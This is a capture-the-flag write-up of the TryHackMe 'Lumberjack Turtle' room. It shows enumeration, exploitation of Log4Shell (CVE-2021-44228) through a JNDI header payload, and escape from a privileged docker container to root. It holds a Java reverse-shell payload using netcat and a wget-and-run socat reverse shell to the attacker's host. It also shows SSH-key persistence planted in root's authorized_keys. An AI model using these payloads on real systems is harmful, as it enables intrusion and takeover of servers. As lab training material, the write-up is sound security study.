Lumberjack Turtle | Sept 28, 2022
Introduction
Welcome to my another writeup! In this TryHackMe Lumberjack Turtle room, you’ll learn: Log4Shell, docker container escape! Without further ado, let’s dive in.
Background
No logs, no crime… so says the lumberjack.
Difficulty: Medium
What do lumberjacks and turtles have to do with this challenge?
Hack into the machine. Get root. You'll figure it out.
- Overall difficulty for me: Easy
- Initial foothold: Easy
- Privilege escalation: Very easy
Service Enumeration
Rustscan:
┌──(root🌸siunam)-[~/ctf/thm/ctf/Lumberjack-Turtle]
└─# export RHOSTS=10.10.87.159
┌──(root🌸siunam)-[~/ctf/thm/ctf/Lumberjack-Turtle]
└─# rustscan --ulimit 5000 -t 2000 --range=1-65535 $RHOSTS -- -sC -sV -oN rustscan/rustscan.txt
[...]
PORT STATE SERVICE REASON VERSION
22/tcp open ssh syn-ack ttl 63 OpenSSH 7.6p1 Ubuntu 4ubuntu0.5 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
| 2048 6a:a1:2d:13:6c:8f:3a:2d:e3:ed:84:f4:c7:bf:20:32 (RSA)
| ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABAQDCnZPtl8mVLJYrSASHm7OakFUsWHrIN9hsDpkfVuJIrX9yTG0yhqxJI1i8dbI/MrexUGrIGzYbgLpYgKGsH4Q4dxB9bj507KQaTLWXwogdrkCVtP0WuGCo2EPZKorU85EWZAhrefG1Pzj3lAx1IdaxTHIS5zTqEJSZYttPF4BHb2avjKDVfSA+4cLP7ybq0rgohJ7JLG5+1dR/ijrGpaXnfudm/9BVjiKcGMlENS6bQ+a32Fs7wxL5c7RfKoR0CjA+pROXrOj5blQM4CI4wrEdphPZ/900I4DJ+kA6Ga+NJF6donQOmmhjsEEpI6RYcz6n/4ql1bomnyyI+jayyf3t
| 256 1d:ac:5b:d6:7c:0c:7b:5b:d4:fe:e8:fc:a1:6a:df:7a (ECDSA)
| ecdsa-sha2-nistp256 AAAAE2VjZHNhLXNoYTItbmlzdHAyNTYAAAAIbmlzdHAyNTYAAABBBBPkLzZd9EQTP/90Y/G1/CYr+PGrh376Qm6aZTO0HZ7lCZ0dExE834/QZ1vNyQPk4jg1KmS09Mzjz1UWWtUCYLg=
| 256 13:ee:51:78:41:7e:3f:54:3b:9a:24:9b:06:e2:d5:14 (ED25519)
|_ssh-ed25519 AAAAC3NzaC1lZDI1NTE5AAAAIFdrmxj3Q5Et6BwEm7pC8cz5louqLoEAwNXGHi+3ee+t
80/tcp open nagios-nsca syn-ack ttl 62 Nagios NSCA
| http-methods:
|_ Supported Methods: GET HEAD OPTIONS
|_http-title: Site doesn't have a title (text/plain;charset=UTF-8).
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
According to rustscan result, we have 2 ports are opened:
| Open Ports | Service |
|---|---|
| 22 | OpenSSH 7.6p1 Ubuntu |
| 80 | Nagios NSCA |
HTTP on Port 80
Let’s take a look at the home page!
┌──(root🌸siunam)-[~/ctf/thm/ctf/Lumberjack-Turtle]
└─# curl http://$RHOSTS/
What you doing here? There is nothing for you to C. Grab a cup of java and look deeper.
Let’s enumerate hidden directory via gobuster!
┌──(root🌸siunam)-[~/ctf/thm/ctf/Lumberjack-Turtle]
└─# gobuster dir -u http://$RHOSTS/ -w /usr/share/wordlists/dirb/common.txt
[...]
/~logs (Status: 200) [Size: 29]
/error (Status: 500) [Size: 73]
- Found directory:
/~logs!
┌──(root🌸siunam)-[~/ctf/thm/ctf/Lumberjack-Turtle]
└─# curl http://$RHOSTS/~logs
No logs, no crime. Go deeper.
Hmm… Let’s use feroxbuster to go deeper:
┌──(root🌸siunam)-[~/ctf/thm/ctf/Lumberjack-Turtle]
└─# feroxbuster -u http://$RHOSTS/ -w /usr/share/wordlists/dirb/common.txt --force-recursion -d 10 -o ferox.txt
[...]
200 GET 1l 19w 87c http://10.10.87.159/
200 GET 1l 6w 29c http://10.10.87.159/~logs
500 GET 1l 1w 0c http://10.10.87.159/error
200 GET 1l 8w 47c http://10.10.87.159/~logs/log4j
[...]
- Found directory:
/log4j!
/~logs/log4j:
┌──(root🌸siunam)-[~/ctf/thm/ctf/Lumberjack-Turtle]
└─# curl http://$RHOSTS/~logs/log4j
Hello, vulnerable world! What could we do HERE?
Since the directory indicates us about Log4Shell, or log4j remote code execution vulnerability in 2021, I’ll use a payload to test it:
There are many articles and blogs talking about Log4Shell RCE exploit:
- Log4Shell: RCE 0-day exploit found in log4j, a popular Java logging package
- CVE-2021-44228 – Log4j 2 Vulnerability Analysis
- Exploiting JNDI Injections in Java
┌──(root🌸siunam)-[~/ctf/thm/ctf/Lumberjack-Turtle]
└─# nc -lnvp 1337
listening on [any] 1337 ...
┌──(root🌸siunam)-[~/ctf/thm/ctf/Lumberjack-Turtle]
└─# curl -H 'X-Api-Version: ${jndi:ldap://10.18.61.134:1337/}' http://$RHOSTS/~logs/log4j
┌──(root🌸siunam)-[~/ctf/thm/ctf/Lumberjack-Turtle]
└─# nc -lnvp 1337
listening on [any] 1337 ...
connect to [10.18.61.134] from (UNKNOWN) [10.10.87.159] 45476
0
`�
It’s vulnerable to Log4Shell!!
Initial Foothold
To exploit that, I’ll:
- Create a malicious Java payload: (Source)
public class exploit {
static {
try {
java.lang.Runtime.getRuntime().exec("nc {YOUR_IP} {YOUR_PORT} -e /bin/bash");
} catch (Exception e) {
e.printStackTrace();
}
}
}
- Compile it in Java version 8:
┌──(root🌸siunam)-[~/ctf/thm/ctf/Lumberjack-Turtle]
└─# javac exploit.java -source 8 -target 8
┌──(root🌸siunam)-[~/ctf/thm/ctf/Lumberjack-Turtle]
└─# ls -lah
[...]
-rw-r--r-- 1 root root 528 Sep 27 23:12 exploit.class
┌──(root🌸siunam)-[~/ctf/thm/ctf/Lumberjack-Turtle]
└─# file exploit.class
exploit.class: compiled Java class data, version 52.0 (Java 1.8)
- Host a LDAP server via marshalsec:
┌──(root🌸siunam)-[~/ctf/thm/ctf/Lumberjack-Turtle]
└─# java -cp /opt/marshalsec/target/marshalsec-0.0.3-SNAPSHOT-all.jar marshalsec.jndi.LDAPRefServer 'http://10.18.61.134/#exploit'
Picked up _JAVA_OPTIONS: -Dawt.useSystemAAFontSettings=on -Dswing.aatext=true
Listening on 0.0.0.0:1389
This will send the connected LDAP connection to http://10.18.61.134/exploit.class.
- Host a web server via python’s
http.servermodule:
┌──(root🌸siunam)-[~/ctf/thm/ctf/Lumberjack-Turtle]
└─# python3 -m http.server 80
Serving HTTP on 0.0.0.0 port 80 (http://0.0.0.0:80/) ...
- Setup a
nclistener:
┌──(root🌸siunam)-[~/ctf/thm/ctf/Lumberjack-Turtle]
└─# nc -lnvp 1337
listening on [any] 1337 ...
- Run the Log4Shell payload:
┌──(root🌸siunam)-[~/ctf/thm/ctf/Lumberjack-Turtle]
└─# curl -H 'X-Api-Version: ${jndi:ldap://10.18.61.134:1389/exploit}' http://$RHOSTS/~logs/log4j
Hello, vulnerable world! Did we get pwnage?
- Reverse shell call back:
┌──(root🌸siunam)-[~/ctf/thm/ctf/Lumberjack-Turtle]
└─# nc -lnvp 1337
listening on [any] 1337 ...
connect to [10.18.61.134] from (UNKNOWN) [10.10.87.159] 38039
whoami;hostname;id;ip a
root
81fbbf1def70
uid=0(root) gid=0(root) groups=0(root),1(bin),2(daemon),3(sys),4(adm),6(disk),10(wheel),11(floppy),20(dialout),26(tape),27(video)
[...]
4: eth0@if5: <BROADCAST,MULTICAST,UP,LOWER_UP,M-DOWN> mtu 1500 qdisc noqueue state UP
link/ether 02:42:ac:11:00:02 brd ff:ff:ff:ff:ff:ff
inet 172.17.0.2/16 brd 172.17.255.255 scope global eth0
valid_lft forever preferred_lft forever
I’m docker container’s root!
Stable shell via socat:
┌──(root🌸siunam)-[/opt/static-binaries/binaries/linux/x86_64]
└─# python3 -m http.server 80
Serving HTTP on 0.0.0.0 port 80 (http://0.0.0.0:80/) ...
wget http://10.18.61.134/socat -O /tmp/socat && chmod +x /tmp/socat && /tmp/socat TCP:10.18.61.134:443 EXEC:'/bin/bash',pty,stderr,setsid,sigint,sane
┌──(root🌸siunam)-[~/ctf/thm/ctf/Lumberjack-Turtle]
└─# socat -d -d file:`tty`,raw,echo=0 TCP-LISTEN:443
2022/09/27 23:43:51 socat[21089] N opening character device "/dev/pts/1" for reading and writing
2022/09/27 23:43:51 socat[21089] N listening on AF=2 0.0.0.0:443
2022/09/27 23:45:52 socat[21089] N accepting connection from AF=2 10.10.87.159:37770 on AF=2 10.18.61.134:443
2022/09/27 23:45:52 socat[21089] N starting data transfer loop with FDs [5,5] and [7,7]
bash-4.4#
bash-4.4# stty rows 22 columns 107
bash-4.4# export TERM=xterm-256color
bash-4.4# ^C
bash-4.4#
flag1.txt:
bash-4.4# find / -type f -name "*flag*" 2>/dev/null
[...]
/opt/.flag1
bash-4.4# cat /opt/.flag1
THM{Redacted}
Privilege Escalation
Docker root to host root
In the ip a command, it reveals that we’re inside a docker container (172.17.0.2):
bash-4.4# ip a
1: lo: <LOOPBACK,UP,LOWER_UP> mtu 65536 qdisc noqueue state UNKNOWN qlen 1000
link/loopback 00:00:00:00:00:00 brd 00:00:00:00:00:00
inet 127.0.0.1/8 scope host lo
valid_lft forever preferred_lft forever
4: eth0@if5: <BROADCAST,MULTICAST,UP,LOWER_UP,M-DOWN> mtu 1500 qdisc noqueue state UP
link/ether 02:42:ac:11:00:02 brd ff:ff:ff:ff:ff:ff
inet 172.17.0.2/16 brd 172.17.255.255 scope global eth0
valid_lft forever preferred_lft forever
To escape this docker container, I’ll:
- Check host disk via
fdisk:
bash-4.4# fdisk -l
Disk /dev/xvda: 40 GiB, 42949672960 bytes, 83886080 sectors
Units: sectors of 1 * 512 = 512 bytes
Sector size (logical/physical): 512 bytes / 512 bytes
I/O size (minimum/optimal): 512 bytes / 512 bytes
Disklabel type: dos
Disk identifier: 0x3650a2cc
Device Boot Start End Sectors Size Id Type
/dev/xvda1 * 2048 83886046 83883999 40G 83 Linux
Disk /dev/xvdh: 1 GiB, 1073741824 bytes, 2097152 sectors
Units: sectors of 1 * 512 = 512 bytes
Sector size (logical/physical): 512 bytes / 512 bytes
I/O size (minimum/optimal): 512 bytes / 512 bytes
Disk /dev/xvdf: 1 GiB, 1073741824 bytes, 2097152 sectors
Units: sectors of 1 * 512 = 512 bytes
Sector size (logical/physical): 512 bytes / 512 bytes
I/O size (minimum/optimal): 512 bytes / 512 bytes
In a well configured docker containers won’t allow command like
fdisk -l. However on miss-configured docker command where the flag--privilegedor--device=/dev/sda1with caps is specified, it is possible to get the privileges to see the host drive. (Source: HackTricks)
Armed with this information, we can just mount the host drive (/dev/xvda1) to /mnt!
- Mount the host drive:
bash-4.4# mkdir /mnt/mount
bash-4.4# mount /dev/xvda1 /mnt/mount/
bash-4.4# ls -lah /mnt/mount/root/
total 28
drwx------ 4 root root 4.0K Dec 13 2021 .
drwxr-xr-x 22 root root 4.0K Sep 28 02:52 ..
drwxr-xr-x 2 root root 4.0K Dec 13 2021 ...
-rw-r--r-- 1 root root 3.0K Apr 9 2018 .bashrc
-rw-r--r-- 1 root root 148 Aug 17 2015 .profile
drwx------ 2 root root 4.0K Dec 13 2021 .ssh
-r-------- 1 root root 29 Dec 13 2021 root.txt
- Add our public SSH key into
/mnt/mount/root/.ssh/authorized_keys:
┌──(root🌸siunam)-[~/ctf/thm/ctf/Lumberjack-Turtle]
└─# mkdir .ssh;cd .ssh/
┌──(root🌸siunam)-[~/…/thm/ctf/Lumberjack-Turtle/.ssh]
└─# ssh-keygen
Generating public/private rsa key pair.
Enter file in which to save the key (/root/.ssh/id_rsa): /root/ctf/thm/ctf/Lumberjack-Turtle/.ssh/id_rsa
Enter passphrase (empty for no passphrase):
Enter same passphrase again:
┌──(root🌸siunam)-[~/…/thm/ctf/Lumberjack-Turtle/.ssh]
└─# cat id_rsa.pub
ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABgQCTZ1N7E6z0JZr3Pr9BlosLZrEu9ok+65BHehPhrjy2iZuzdSLuoGb4TRgzaUNXlIvKTYq6yKo1G2PF5Yr/5Ux8VHOR01L48b6vMdiGYQMBXYwkHOap/I6A6sie3DdQgpW1GbEWIkI3hVPucyD9oUdPBgPafIRFJ/oAPN/qerEg/raMq5c9IjqxmLA1FpqMaW7ZRpBioT3+F7FNfagHLNDBSHrDPN8ooelOrZ6eD62qpArsvrotLzFmXWlel0kikM/FZktJtA3+EvwYOBBag8zZIvZE/6oZRUaiw67DhOTjGcsVt8icpSEOvhE+txUc4+5Bhym+olR5M5jOIZwOZkDlkrQW52UswlqCi34eOGfNXO3Fscdv7YmKzpSq2XIxCMiyDN+lnPKEML/AltMEHNNVRm0lCFnJHZV/FZuyOLwKccX6i8tQcYzcBxtbTFslF4VOhrv3ThmMFr0dbjDg7PV4fwB4BBLwUL8BtURcQqglybgmx/FvHpGpv8fTfOoplL8= root@siunam
bash-4.4# echo "ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABgQCTZ1N7E6z0JZr3Pr9BlosLZrEu9ok+65BHehPhrjy2iZuzdSLuoGb4TRgzaUNXlIvKTYq6yKo1G2PF5Yr/5Ux8VHOR01L48b6vMdiGYQMBXYwkHOap/I6A6sie3DdQgpW1GbEWIkI3hVPucyD9oUdPBgPafIRFJ/oAPN/qerEg/raMq5c9IjqxmLA1FpqMaW7ZRpBioT3+F7FNfagHLNDBSHrDPN8ooelOrZ6eD62qpArsvrotLzFmXWlel0kikM/FZktJtA3+EvwYOBBag8zZIvZE/6oZRUaiw67DhOTjGcsVt8icpSEOvhE+txUc4+5Bhym+olR5M5jOIZwOZkDlkrQW52UswlqCi34eOGfNXO3Fscdv7YmKzpSq2XIxCMiyDN+lnPKEML/AltMEHNNVRm0lCFnJHZV/FZuyOLwKccX6i8tQcYzcBxtbTFslF4VOhrv3ThmMFr0dbjDg7PV4fwB4BBLwUL8BtURcQqglybgmx/FvHpGpv8fTfOoplL8= root@siunam" > /mnt/mount/root/.ssh/authorized_keys
- SSH into the target machine:
┌──(root🌸siunam)-[~/…/thm/ctf/Lumberjack-Turtle/.ssh]
└─# ssh -i id_rsa root@$RHOSTS
[...]
root@lumberjackturtle:~# whoami;hostname;id;ip a
root
lumberjackturtle
uid=0(root) gid=0(root) groups=0(root)
1: lo: <LOOPBACK,UP,LOWER_UP> mtu 65536 qdisc noqueue state UNKNOWN group default qlen 1000
link/loopback 00:00:00:00:00:00 brd 00:00:00:00:00:00
inet 127.0.0.1/8 scope host lo
valid_lft forever preferred_lft forever
inet6 ::1/128 scope host
valid_lft forever preferred_lft forever
2: eth0: <BROADCAST,MULTICAST,UP,LOWER_UP> mtu 9001 qdisc fq_codel state UP group default qlen 1000
link/ether 02:75:4f:ed:40:01 brd ff:ff:ff:ff:ff:ff
inet 10.10.87.159/16 brd 10.10.255.255 scope global dynamic eth0
valid_lft 2945sec preferred_lft 2945sec
inet6 fe80::75:4fff:feed:4001/64 scope link
valid_lft forever preferred_lft forever
3: docker0: <BROADCAST,MULTICAST,UP,LOWER_UP> mtu 1500 qdisc noqueue state UP group default
link/ether 02:42:15:07:5e:8a brd ff:ff:ff:ff:ff:ff
inet 172.17.0.1/16 brd 172.17.255.255 scope global docker0
valid_lft forever preferred_lft forever
inet6 fe80::42:15ff:fe07:5e8a/64 scope link
valid_lft forever preferred_lft forever
5: veth9f1c5c7@if4: <BROADCAST,MULTICAST,UP,LOWER_UP> mtu 1500 qdisc noqueue master docker0 state UP group default
link/ether 86:5a:35:b0:21:bb brd ff:ff:ff:ff:ff:ff link-netnsid 0
inet6 fe80::845a:35ff:feb0:21bb/64 scope link
valid_lft forever preferred_lft forever
I’m root! :D
Rooted
root@lumberjackturtle:~# cat /root/root.txt
Pffft. Come on. Look harder.
root@lumberjackturtle:~# ls -lah
total 36K
drwx------ 6 root root 4.0K Sep 28 04:02 .
drwxr-xr-x 22 root root 4.0K Sep 28 02:52 ..
drwxr-xr-x 2 root root 4.0K Dec 13 2021 ...
-rw-r--r-- 1 root root 3.1K Apr 9 2018 .bashrc
drwx------ 2 root root 4.0K Sep 28 04:02 .cache
drwx------ 3 root root 4.0K Sep 28 04:02 .gnupg
-rw-r--r-- 1 root root 148 Aug 17 2015 .profile
drwx------ 2 root root 4.0K Dec 13 2021 .ssh
-r-------- 1 root root 29 Dec 13 2021 root.txt
- Found directory:
...
root.txt:
root@lumberjackturtle:~# cat .../._fLaG2
THM{Redacted}
Conclusion
What we’ve learned:
- Directory Enumeration
- Log4Shell (CVE-2021-44228)
- Docker Container Escape via Mounting Host Drive